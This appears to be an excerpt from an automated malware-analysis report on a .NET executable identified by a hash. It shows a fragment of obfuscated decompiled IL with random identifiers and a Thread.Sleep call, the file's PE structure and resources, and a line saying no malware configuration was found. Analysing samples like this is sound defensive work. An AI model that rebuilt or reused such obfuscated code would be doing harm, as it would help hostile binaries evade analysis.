LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb pop <null> leave IL_0283: ret ret <null>

18ef22f92a32fcb74643b63a768d37b3 (511.49 KB)
File Structure
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
s9rmcax0ldp2fl39v
5vl9g11n592cuoh
Characteristics
No malware configuration was found at this point.